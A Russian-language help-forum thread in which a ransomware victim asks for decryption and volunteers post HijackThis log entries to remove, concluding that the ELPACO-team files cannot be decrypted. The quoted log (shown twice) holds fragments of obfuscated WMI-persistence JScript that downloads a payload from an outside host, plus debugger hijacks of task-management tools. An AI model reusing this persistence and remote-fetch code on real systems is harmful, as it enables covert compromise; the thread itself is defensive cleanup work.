Помогите расшифровать файлы

**plmcom** · 17.03.2025, 01:04

День добрый. Злоумышленник проник на ПК через уязвимость, получил права админа и зашифровал все файлы. Помогите пожалуйста расшифровать.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 17.03.2025, 01:05

Уважаемый(ая) plmcom, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

**Vvvyg** · 17.03.2025, 16:59

Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:

Код:

O4 - HKLM\..\Run: [systemsg] = C:\Users\admin\AppData\Local\1BCB5402-B625-DF8D-10F9-848460144A65\systemsg.exe (file missing)
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Games (empty)
O23 - Driver S1: ushrcquj - C:\Windows\system32\drivers\ushrcquj.sys (file missing) (+safe mode)
O25 - WMI Event: __gconsumer1 - __gfilter1 - var e,r,n,s,c,l,o=3000,p="htt"+"p:/"+"/w.gem"+"lab.top/x64/k.txt";for(s=new ActiveXObject("Micro"+"soft.XM"+"LHTTP"),x=new ActiveXObject("Scri"+"pting.Fil"+"esystemObject"),l=new ActiveXObject("WSc"+"ript.S"+"hell"),s.open("GET",p,!1),s.send(),q=s.responseText,r=q.split("\r\n"),i=0;i<r.length;i++)if(883 bytes)
O25 - WMI Event: __StagingConsumer - __StagingFilter - function s(e){var t=new ActiveXObject("ADODB.Stream");t.Type=1,t.Open(),t.Write(e),t.Position=0,t.Type=2,t.CharSet="UTF-16LE";var n=t.ReadText(),r=[];for(var i=0;i<n.length;i++){var s=n.charCodeAt(i);r.push(s&255),r.push(s>>8&255)}return r}function o(e){var e=s(e),t=e.slice(0,32),n=e.slice(32),r="";(1207 bytes)
O25 - WMI Event: __StagingConsumer - __StartupFilter - Event="__InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320", function s(e){var t=new ActiveXObject("ADODB.Stream");t.Type=1,t.Open(),t.Write(e),t.Position=0,t.Type=2,t.CharSet="UTF-16LE";var n=t.ReadText(),r=[];for(var i=0;i<n.length;i++){var s=n.charCodeAt(i);r.push(s&255),r.push(s>>8&255)}return r}function o(e){var e=s(e),t=e.slice(0,32),n=e.slice(32),r="";(1207 bytes)
O26 - Debugger: HKLM\..\CompatTelRunner.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\logoff.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\perfmon.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchApp.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchIndexer.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchProtocolHost.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\shutdown.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\taskkill.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\tasklist.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\taskmgr.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\wsqmcons.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')

Выложите в архиве записку о выкупе и пару зашифрованных файлов. Но, судя по имени файла Decrypt_ELPACO-team_info.txt по данному вымогателю без приватного ключа расшифровка невозможна.

**plmcom** · 17.03.2025, 19:00

Сообщение от Vvvyg

Запустите HijackThis, расположенный в папке Autologger и пофиксите только эти строки:

Код:

O4 - HKLM\..\Run: [systemsg] = C:\Users\admin\AppData\Local\1BCB5402-B625-DF8D-10F9-848460144A65\systemsg.exe (file missing)
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2022/05/25) - {bedd5ca4-98b5-420d-9d9e-6a4c01a7b692} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Games (empty)
O23 - Driver S1: ushrcquj - C:\Windows\system32\drivers\ushrcquj.sys (file missing) (+safe mode)
O25 - WMI Event: __gconsumer1 - __gfilter1 - var e,r,n,s,c,l,o=3000,p="htt"+"p:/"+"/w.gem"+"lab.top/x64/k.txt";for(s=new ActiveXObject("Micro"+"soft.XM"+"LHTTP"),x=new ActiveXObject("Scri"+"pting.Fil"+"esystemObject"),l=new ActiveXObject("WSc"+"ript.S"+"hell"),s.open("GET",p,!1),s.send(),q=s.responseText,r=q.split("\r\n"),i=0;i<r.length;i++)if(883 bytes)
O25 - WMI Event: __StagingConsumer - __StagingFilter - function s(e){var t=new ActiveXObject("ADODB.Stream");t.Type=1,t.Open(),t.Write(e),t.Position=0,t.Type=2,t.CharSet="UTF-16LE";var n=t.ReadText(),r=[];for(var i=0;i<n.length;i++){var s=n.charCodeAt(i);r.push(s&255),r.push(s>>8&255)}return r}function o(e){var e=s(e),t=e.slice(0,32),n=e.slice(32),r="";(1207 bytes)
O25 - WMI Event: __StagingConsumer - __StartupFilter - Event="__InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320", function s(e){var t=new ActiveXObject("ADODB.Stream");t.Type=1,t.Open(),t.Write(e),t.Position=0,t.Type=2,t.CharSet="UTF-16LE";var n=t.ReadText(),r=[];for(var i=0;i<n.length;i++){var s=n.charCodeAt(i);r.push(s&255),r.push(s>>8&255)}return r}function o(e){var e=s(e),t=e.slice(0,32),n=e.slice(32),r="";(1207 bytes)
O26 - Debugger: HKLM\..\CompatTelRunner.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\logoff.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\perfmon.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchApp.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchIndexer.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\SearchProtocolHost.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\shutdown.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\taskkill.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\tasklist.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\taskmgr.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')
O26 - Debugger: HKLM\..\wsqmcons.exe: [Debugger] = C:\Windows\System32\Systray.exe (sign: 'Microsoft')

Выложите в архиве записку о выкупе и пару зашифрованных файлов. Но, судя по имени файла Decrypt_ELPACO-team_info.txt по данному вымогателю без приватного ключа расшифровка невозможна.

во вложении файлы, единственное я не понял правильно ли я приложил log

**Sandor** · 18.03.2025, 09:21

Сообщение от Vvvyg

по данному вымогателю без приватного ключа расшифровка невозможна

Подтверждаю. Вот описание вымогателя.

**Vvvyg** · 18.03.2025, 10:59

plmcom
Систему будете переустанавливать, или обновлять/настраивать?

**plmcom** · 18.03.2025, 11:49

Сообщение от Vvvyg

plmcom
Систему будете переустанавливать, или обновлять/настраивать?

Я пока просто снял жесткий диск в надежде восстановить файлы.

**Vvvyg** · 19.03.2025, 14:13

С этим помочь нет возможности.

Помогите расшифровать файлы (заявка № 228959)

Опции темы